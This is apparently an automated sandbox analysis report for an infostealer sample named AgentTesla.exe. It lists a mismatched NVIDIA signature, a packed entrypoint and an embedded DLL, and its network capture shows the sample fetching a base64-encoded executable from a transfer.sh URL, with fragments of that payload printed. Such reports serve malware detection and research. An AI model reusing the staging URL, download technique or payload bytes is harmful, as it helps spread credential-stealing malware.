Signature Issuer:	CN=VeriSign Class 3 Code Signing 2010 CA, OU=Terms of use at https://www.verisign.com/rpa (c)10, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
Signature Validation Error:	A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file
Error Number:	-2146762495
Not Before, Not After	9/1/2011 5:00:00 PM 9/1/2014 4:59:59 PM
Subject Chain	CN=NVIDIA Corporation, OU=Software, OU=Digital ID Class 3 - Microsoft Software Validation v2, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
Version:	3
Thumbprint MD5:	CBD07103D9E8DF2383EE16E696B15D6D
Thumbprint SHA-1:	579AEC4489A2CA8A2A09DF5DC0323634BD8B16B7
Thumbprint SHA-256:	21C13D0A5037EBB97EB9AE094D8D5839B4BC9BBA751C848064C82EC3A42A3134
Serial:	43BB437D609866286DD839E1D00309F5

Entrypoint Preview

Instruction
call 00007FA720A465D0h
push ebx
mov ebx, esp
push ebx
mov esi, dword ptr [ebx+08h]
mov edi, dword ptr [ebx+10h]
cld
mov dl, 80h
mov al, byte ptr [esi]
inc esi
mov byte ptr [edi], al
inc edi
mov ebx, 00000002h
add dl, dl
jne 00007FA720A46487h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
jnc 00007FA720A4646Ch
add dl, dl
jne 00007FA720A46487h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
jnc 00007FA720A464D3h
xor eax, eax
add dl, dl
jne 00007FA720A46487h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
jnc 00007FA720A46567h
add dl, dl
jne 00007FA720A46487h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
adc eax, eax
add dl, dl
jne 00007FA720A46487h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
adc eax, eax
add dl, dl
jne 00007FA720A46487h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
adc eax, eax
add dl, dl
jne 00007FA720A46487h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
adc eax, eax
je 00007FA720A4648Ah
push edi
mov eax, eax
sub edi, eax
mov al, byte ptr [edi]
pop edi
mov byte ptr [edi], al
inc edi
mov ebx, 00000002h
jmp 00007FA720A4641Bh
mov eax, 00000001h
add dl, dl
jne 00007FA720A46487h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
adc eax, eax
add dl, dl
jne 00007FA720A46487h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
jc 00007FA720A4646Ch
sub eax, ebx
mov ebx, 00000001h
jne 00007FA720A464AAh
mov ecx, 00000001h
add dl, dl
jne 00007FA720A46487h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
adc ecx, ecx
add dl, dl
jne 00007FA720A46487h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
jc 00007FA720A4646Ch
push esi
mov esi, edi
sub esi, ebp

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x26c03a	0x50	.imports
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x12000	0x25736a	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x6ea1d0	0x1310	.winlice
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x2000	0x10000	0x7092	False	1.00027760428	data	7.95088629607	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x12000	0x25736a	0x257400	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x26a000	0xc	0x200	False	0.044921875	data	0.0815394123432	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.imports	0x26c000	0x2000	0x200	False	0.16796875	data	1.14864242974	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.winlice	0x26e000	0x6d6000	0x0	unknown	unknown	unknown	unknown	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.boot	0x944000	0x48b400	0x48b3c9	unknown	unknown	unknown	unknown	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x125c0	0x2868	dBase III DBT, version number 0, next free block index 40	English	United States
RT_ICON	0x14e28	0x16e8	dBase III DBT, version number 0, next free block index 40	English	United States
RT_ICON	0x16510	0xa68	data	English	United States
RT_ICON	0x16f78	0x668	dBase III DBT, version number 0, next free block index 40	English	United States
RT_ICON	0x175e0	0x2e8	data	English	United States
RT_ICON	0x178c8	0x1e8	data	English	United States
RT_ICON	0x17ab0	0x128	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x17bd8	0x4a6d	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States
RT_ICON	0x1c648	0x4c28	data	English	United States
RT_ICON	0x21270	0x2ca8	data	English	United States
RT_ICON	0x23f18	0x1628	data	English	United States
RT_ICON	0x25540	0xea8	data	English	United States
RT_ICON	0x263e8	0x8a8	data	English	United States
RT_ICON	0x26c90	0x6c8	data	English	United States
RT_ICON	0x27358	0x568	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x278c0	0x5286	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States
RT_ICON	0x2cb48	0x10828	dBase III DBT, version number 0, next free block index 40	English	United States
RT_ICON	0x3d370	0x94a8	dBase III DBT, version number 0, next free block index 40	English	United States
RT_ICON	0x46818	0x4228	dBase III DBT, version number 0, next free block index 40	English	United States
RT_ICON	0x4aa40	0x25a8	dBase III DBT, version number 0, next free block index 40	English	United States
RT_ICON	0x4cfe8	0x10a8	dBase III DBT, version number 0, next free block index 40, 1st item "\252]\030\251\253\\030\377\253\\030\377\252[\027\377\252Z\027\377\251Z\030\377\251Y\030\377\250Y\030\377\247W\027\357"	English	United States
RT_ICON	0x4e090	0x988	data	English	United States
RT_ICON	0x4ea18	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_RCDATA	0x4ee80	0x219c58	PE32 executable (DLL) (console) Intel 80386, for MS Windows
RT_GROUP_ICON	0x268ad8	0x148	data	English	United States
RT_VERSION	0x268c20	0x2c0	data
RT_VERSION	0x268ee0	0x2a0	data	English	United States
RT_MANIFEST	0x269180	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
kernel32.dll	GetModuleHandleA
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2022
Assembly Version	1.0.0.0
InternalName	DDDHJYUTYE.exe
FileVersion	1.0.0.0
ProductName	DDDHJYUTYE
ProductVersion	1.0.0.0
FileDescription	DDDHJYUTYE
OriginalFilename	DDDHJYUTYE.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Download Network PCAP: filtered – full

Network Port Distribution

Total Packets: 75
• 443 (HTTPS)
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 14, 2022 17:02:09.002093077 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:09.002146959 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:09.002268076 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:09.374979973 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:09.375013113 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:09.533190012 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:09.533319950 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:09.538209915 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:09.538228989 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:09.538460016 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:09.750186920 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:09.750288010 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.099360943 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.146186113 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.821212053 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.821244001 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.821265936 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.821379900 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.821404934 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.821465015 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.821583033 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.821614981 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.821652889 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.821665049 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.821695089 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.821722984 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.843519926 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.843548059 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.843606949 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.843626022 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.843658924 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.843677044 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.844508886 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.844533920 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.844598055 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.844609022 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.844635010 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.844652891 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.845428944 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.845453978 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.845498085 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.845511913 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.845554113 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.845566988 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.865613937 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.865638971 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.865722895 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.865740061 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.865781069 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.865808010 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.866192102 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.866215944 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.866278887 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.866292000 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.866343021 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.866513014 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.866543055 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.866589069 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.866600037 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.866631985 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.866664886 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.866868019 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.866892099 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.866955042 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.866966963 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.867014885 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.867321014 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.867346048 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.867394924 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.867405891 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.867455959 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.867470026 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.887655973 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.887681961 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.887833118 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.887854099 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.887918949 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.887937069 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.887962103 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.888006926 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.888019085 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.888060093 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.888092995 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.888284922 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.888308048 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.888358116 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.888371944 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.888411999 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.888437986 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.888629913 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.888655901 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.888708115 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.888720989 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.888751984 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.888781071 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.888997078 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.889019966 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.889081955 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.889096022 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.889152050 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.889312029 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.889342070 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.889398098 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.889413118 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.889444113 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.889477015 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.889646053 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.889678001 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.889730930 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.889743090 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.889796972 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.889825106 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.889902115 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.889976025 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.890002966 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.890043974 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.890049934 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.890064001 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.890113115 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.890130997 CET	443	49767	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.890188932 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.890394926 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.900322914 CET	49767	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.906084061 CET	49770	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.906126976 CET	443	49770	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.906214952 CET	49770	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.906968117 CET	49770	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:10.906979084 CET	443	49770	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:10.987724066 CET	443	49770	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:11.016495943 CET	49770	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:11.016522884 CET	443	49770	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:12.010796070 CET	443	49770	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:12.010833025 CET	443	49770	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:12.010839939 CET	443	49770	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:12.010885954 CET	443	49770	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:12.010914087 CET	443	49770	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:12.010998011 CET	49770	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:12.011018991 CET	443	49770	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:12.011044979 CET	49770	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:12.011071920 CET	49770	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:12.011415005 CET	443	49770	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:12.011437893 CET	443	49770	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:12.011518955 CET	49770	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:12.011532068 CET	443	49770	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:12.011563063 CET	49770	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:12.011590958 CET	49770	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:12.032758951 CET	443	49770	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:12.032788038 CET	443	49770	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:12.032876015 CET	49770	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:12.032895088 CET	443	49770	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:12.032947063 CET	49770	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:12.033418894 CET	443	49770	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:12.033463955 CET	443	49770	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:12.033478975 CET	443	49770	144.76.136.153	192.168.2.7
Mar 14, 2022 17:02:12.033518076 CET	49770	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:12.033576965 CET	49770	443	192.168.2.7	144.76.136.153
Mar 14, 2022 17:02:12.034535885 CET	49770	443	192.168.2.7	144.76.136.153

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 14, 2022 17:02:08.899502993 CET	60412	53	192.168.2.7	8.8.8.8
Mar 14, 2022 17:02:08.918281078 CET	53	60412	8.8.8.8	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Mar 14, 2022 17:02:08.899502993 CET	192.168.2.7	8.8.8.8	0x3e0	Standard query (0)	transfer.sh	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Mar 14, 2022 17:02:08.918281078 CET	8.8.8.8	192.168.2.7	0x3e0	No error (0)	transfer.sh		144.76.136.153	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

transfer.sh

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.7	49767	144.76.136.153	443	C:\Users\user\Desktop\AgentTesla.exe

Timestamp	kBytes transferred	Direction	Data
2022-03-14 16:02:10 UTC	0	OUT	GET /get/jwhuCr/devvvv.txt HTTP/1.1 Host: transfer.sh Connection: Keep-Alive
2022-03-14 16:02:10 UTC	0	IN	HTTP/1.1 200 OK Server: nginx/1.14.2 Date: Mon, 14 Mar 2022 16:02:10 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 295596 Connection: close Content-Disposition: attachment; filename="devvvv.txt" Retry-After: Mon, 14 Mar 2022 17:02:14 GMT X-Made-With: <3 by DutchCoders X-Ratelimit-Key: 127.0.0.1,102.129.143.93,102.129.143.93 X-Ratelimit-Limit: 10 X-Ratelimit-Rate: 600 X-Ratelimit-Remaining: 9 X-Ratelimit-Reset: 1647273734 X-Remaining-Days: n/a X-Remaining-Downloads: n/a X-Served-By: Proudly served by DutchCoders Strict-Transport-Security: max-age=63072000
2022-03-14 16:02:10 UTC	0	IN	Data Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 4a 76 6c 48 57 49 41 41 41 41 41 41 41 41 41 41 4f 41 41 41 67 45 4c 41 51 73 41 41 46 67 44 41 41 41 49 41 41 41 41 41 41 41 41 72 6e 59 44 41 41 41 67 41 41 41 41 41 41 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41 Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJvlHWIAAAAAAAAAAOAAAgELAQsAAFgDAAAIAAAAAAAArnYDAAAgAAAAAAAAAABAAAAgAAAAAgA
2022-03-14 16:02:10 UTC	16	IN	Data Raw: 43 6a 4a 41 41 41 47 62 38 59 41 41 41 72 65 44 79 55 6f 4e 77 41 41 43 68 4d 7a 4b 44 67 41 41 41 72 65 41 42 45 49 4b 4e 67 41 41 41 5a 76 78 67 41 41 43 74 34 50 4a 53 67 33 41 41 41 4b 45 7a 51 6f 4f 41 41 41 43 74 34 41 45 51 67 6f 33 41 41 41 42 6d 2f 47 41 41 41 4b 33 67 38 6c 4b 44 63 41 41 41 6f 54 4e 53 67 34 41 41 41 4b 33 67 41 52 43 43 6a 41 41 41 41 47 62 38 59 41 41 41 72 65 44 79 55 6f 4e 77 41 41 43 68 4d 32 4b 44 67 41 41 41 72 65 41 42 45 49 4b 4e 30 41 41 41 5a 76 78 67 41 41 43 74 34 50 4a 53 67 33 41 41 41 4b 45 7a 63 6f 4f 41 41 41 43 74 34 41 45 51 67 6f 36 67 41 41 42 6d 2f 47 41 41 41 4b 33 67 38 6c 4b 44 63 41 41 41 6f 54 4f 43 67 34 41 41 41 4b 33 67 41 52 43 43 6a 53 41 41 41 47 62 38 59 41 41 41 72 65 44 79 55 6f 4e 77 41 41 Data Ascii: CjJAAAGb8YAAAreDyUoNwAAChMzKDgAAAreABEIKNgAAAZvxgAACt4PJSg3AAAKEzQoOAAACt4AEQgo3AAABm/GAAAK3g8lKDcAAAoTNSg4AAAK3gARCCjAAAAGb8YAAAreDyUoNwAAChM2KDgAAAreABEIKN0AAAZvxgAACt4PJSg3AAAKEzcoOAAACt4AEQgo6gAABm/GAAAK3g8lKDcAAAoTOCg4AAAK3gARCCjSAAAGb8YAAAreDyUoNwAA
2022-03-14 16:02:10 UTC	32	IN	Data Raw: 68 39 41 6a 53 73 41 41 41 45 54 47 42 45 55 48 78 41 52 47 42 59 52 47 49 36 33 4b 42 63 42 41 41 6f 52 47 43 67 62 41 51 41 4b 4b 46 63 43 41 41 59 6f 4c 67 49 41 42 6d 39 34 41 41 41 4b 45 78 38 52 48 69 67 62 41 51 41 4b 4b 46 63 43 41 41 59 6f 4c 67 49 41 42 6d 39 34 41 41 41 4b 45 79 41 52 48 78 45 67 62 78 77 42 41 41 6f 73 44 41 63 52 42 68 45 58 62 7a 30 42 41 41 72 65 47 67 63 4b 33 51 30 42 41 41 41 48 43 74 30 47 41 51 41 41 45 52 55 73 42 78 45 56 62 31 63 41 41 41 72 63 4f 4f 41 41 41 41 41 49 49 41 4e 6d 41 41 42 41 30 51 41 41 41 41 6b 67 43 59 41 41 41 45 44 47 41 41 41 41 63 79 6b 42 41 41 6f 54 49 68 36 4e 4b 77 41 41 41 52 4d 6a 48 78 69 4e 4b 77 41 41 41 52 4d 6b 45 51 55 66 47 42 45 6a 46 68 34 6f 46 77 45 41 43 68 45 46 46 68 45 6b Data Ascii: h9AjSsAAAETGBEUHxARGBYRGI63KBcBAAoRGCgbAQAKKFcCAAYoLgIABm94AAAKEx8RHigbAQAKKFcCAAYoLgIABm94AAAKEyARHxEgbxwBAAosDAcRBhEXbz0BAAreGgcK3Q0BAAAHCt0GAQAAERUsBxEVb1cAAArcOOAAAAAIIANmAABA0QAAAAkgCYAAAEDGAAAAcykBAAoTIh6NKwAAARMjHxiNKwAAARMkEQUfGBEjFh4oFwEAChEFFhEk
